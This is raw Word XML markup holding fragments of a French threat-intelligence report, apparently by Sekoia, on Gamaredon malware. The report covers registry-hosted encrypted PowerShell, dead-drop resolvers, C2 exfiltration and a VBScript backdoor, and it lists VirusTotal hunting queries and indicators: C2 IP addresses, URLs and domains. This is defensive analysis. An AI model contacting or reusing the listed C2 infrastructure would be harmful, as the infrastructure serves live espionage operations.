            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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réseau en temps réel, mettre en cache les sorties DDR et les serveurs relais ou C2, afin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3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4804433</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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garantir que la boucle d’infection ne soit jamais rompue. Le registre héberge également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4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4977788</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">littéralement Gam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maSteel, y compris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ses 71 fonctions Powershell distinctes, directement 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5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5169758</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">sein de la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HKCU\Printers\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. Marquant un changement majeur dans ses TTP,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6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5366408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Gamaredon utilise l’API DPAPI de W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indows pour chiffrer ces fon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ctions hébergées dans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7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5558378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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registre. En utilisant la méthode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ConvertTo-SecureString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 sans clé spécifiée,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8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5755028</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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chiffrement est strictement lié à la session active de l’utilisateur. Il convient de noter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9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5928383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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cette TTP recoupe fortement les comportements historiques de l’ensemble d’intrusion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0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6101738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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InvisiMole en 2020, un opérateur lié au FSB précédemment observé en collaboration avec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1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6275093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Gamaredon, comme l’a détaillé ESET dans son rapport "InvisiMole : The Hidden Part of the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2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6448448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Story"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36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. Enfin, ce processus de déploiement complexe est complété par une fonctionnalité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3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6621803</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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de porte dérobée opportuniste intégrée au flux de communication. À presque chaque étape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4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6795158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’interaction réseau, qu’il s’agisse d’un chargeur interrogeant un DDR ou de chaque fichier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5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6968513</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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exfiltré par le voleur de données via son C2 de secours, le système analyse la réponse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6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7141868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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HTTP et l’exécute aveuglément si elle contient du code VBScript. Cela garantit à l’opérateur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7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7315223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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possibilité de déclencher l’exécution de code distant arbitraire à tout moment au cours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8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7488578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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cycle de vie de l’infection, ce qui lui permet de déployer de nouvelles charges utiles à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9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7661933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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volée ou, éventuellement, de dépanner le système en cas de rupture du pipeline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0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7835288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="819274" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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92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d’exfiltration.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1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8417583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1223191" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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31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Note de l’analyste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2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8689605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5880553" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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805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L’analyse de l’échantillon </w:t>
                        </w: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serial.sys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, identifié via la requête VirusTotal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3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8877958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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engines:trojan AND engines:pterodo AND engines:gamaredon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et soumis sur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4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9063378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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plateforme le 23 juin 2026, suggère l’existence potentielle d’une campagne en cours,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5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9236733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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différente</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="21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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="21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celles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analysées.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L’échantillon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contacte</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="21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l’URL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6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3913796" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1379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36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https://web-assets.esetstatic.com/wls/2020/06/ESET_InvisiMole.pdf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80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904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00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108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821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09235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5267959"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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5267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526795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2183129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2183129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4992369"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4992369"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5267959"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5267959"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4992369"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4173219"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4173219"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4992369"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4992369"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4173219"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3898900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3898900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4173219"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4173219"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3898900"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3627119"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3627119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3898900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3898900"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3627119"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3355340"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3355340"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3627119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3627119"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3355340"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3082924"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3082924"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3355340"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3355340"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3082924"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2461259"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2461259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3083559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3083559"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2461259"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2183129"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2183129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2461259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2461259"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="218312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2183129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="218312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054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3173104</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3084829"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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0848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084829">
                          <a:moveTo>
                            <a:pt x="0" y="2809239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2809239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3084829"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3084829"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2809239"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1990089"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1990089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2809239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2809239"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1990089"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1715770"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1715770"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1990089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1990089"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1715770"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1443989"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1443989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1715770"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1715770"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1443989"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1172210"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1172210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1443989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1443989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1172210"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="899794"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="899794"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1172210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1172210"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="899794"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="278129"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="278129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="900430"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="900430"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="278129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278129"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="27812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9760" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6504304</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2759719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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5904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2759719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3884294" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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4294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84294" h="414020">
                          <a:moveTo>
                            <a:pt x="83820" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="83820" y="214629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3883660" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3883660" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="83184" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3884294" y="215265"/>
                          </a:lnTo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692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795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18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957845</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://te.legra.ph:443/ahwrctpggea-05-07,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correspondant à une page créée le 7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1137550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796798" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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mai 2026 et redirigeant vers le C2 </w:t>
                        </w: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https://www.zoho.com@thesole.dpdns.org/mammet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1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1493543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Comme observé dans les échantillons précédemment analysés par Sekoia, l’exfiltration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2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1666898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’empreinte de la machine compromise est réalisée via des en-têtes HTTP contenant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3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1840253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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valeurs aléatoires générées dynamiquement. Dans ce cas, les données sont transmises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4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2010675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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https://6goa83.rubinovich.ru/provide/2366.avi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. La même requête est également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5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5874162" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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16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envoyée vers </w:t>
                        </w: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https://colb5.iuzhpkpd4sph.workers.dev/358/extended/extended.as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6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2370085</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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et </w:t>
                        </w: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https://o9f.addison8.workers.dev/pinprick/100.asf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(les extensions sont et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7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2552723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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8"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">parties du chemin prises aléatoirement dans des listes codées en dur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819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2744693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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".db",".icl",".m4v",".mts",".ndx",".avi",".asf",".as", ".kdp",".brk"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9216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1003300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2959958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3949671" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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4967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"canvas","shorts","brush","extended","provide"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0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2964050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="119833" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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83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1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3536338</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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Les tentatives de pivot à partir de ces nouveaux indicateurs n’ont pas permis d’identifier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2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3709693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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d’autres artefacts ou échantillons associés. Les recherches suivantes ont été effectuées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3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3883048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1580220" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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02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sans résultat concluant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4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4145785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4562852" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="29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285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1"/>
                            <w:spacing w:val="42"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> -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behaviour_network:6goa83.rubinovich.ru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5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4417565</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5401052" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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105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13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71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behaviour_network:colb5.iuzhpkpd4sph.workers.dev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6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4689345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4898132" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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98132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71"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> -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behaviour_network:o9f.addison8.workers.dev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7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5248298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Par ailleurs, un seul échantillon a été identifié comme communiquant avec ce nouveau DDR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8432" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3906570</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5421653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="509743" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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requête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9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5421653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="213999" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9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via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0480" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2438742</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5421653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="144707" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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70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1504" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5700737</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5421653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1081515" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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15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2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5607073</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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behaviour_network:"https://te.legra.ph/ahwrctpggea-05-07"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="28"/>
                          </w:rPr>
                          <w:t xml:space="preserve">, il s'agit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3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5792493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1218676" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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86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l'échantillon étudié.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4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6892313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="284130" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1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5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7167268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="866213" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2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Adresses IP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6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7436115</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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104.194.140.6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7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7612645</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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172.86.76.132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8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7789175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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165.22.170.129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9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7965705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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77.110.107.165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0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8142235</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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107.189.19.48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1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8318765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5.181.2.158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2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8495295</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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194.58.66.82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3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8854463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="392630" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6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URL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4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9123310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5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https://graph.org/kyjfkyr-12-06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5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9299840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://bold.zsjtn41091.workers.dev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6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9476370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3026111" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://teletype.in/@myrain/Xh1Lta2Ccro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78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2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891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2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99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2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096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2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198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2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16300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2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403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2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5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1952377" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://quitethepastry.ru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6080" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6582244</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>954670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="112807" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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80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69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7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2565939" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9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https://telegra.ph/f8bfl6sp-01-02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8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1646154" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1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https:/t.me/s/teotori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9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2719330" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://www.telegram.me/s/oberfarir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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://insight-sweet-drainage-appreciated.trycloudflare.com/log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2412549" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5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https://telegram.me/s/oberfarir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2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3562978" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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297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https://api.telegra.ph/getPage/Hello-01-23-161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3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3102806" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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28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https://write.as/api/posts/1nei1af6dnw8q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4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2029072" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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https://rentry.co/hwzrmfkx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5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4482763" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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27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https://mastodon.social/api/v1/statuses/115942411657067215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6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3079138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1246477" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Noms de domaine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7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3422915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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justsstop.ru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8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3599445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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iiwdsxwamylbwwsoyrmj.supabase.co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9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3775975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1492764" cy="163574"/>
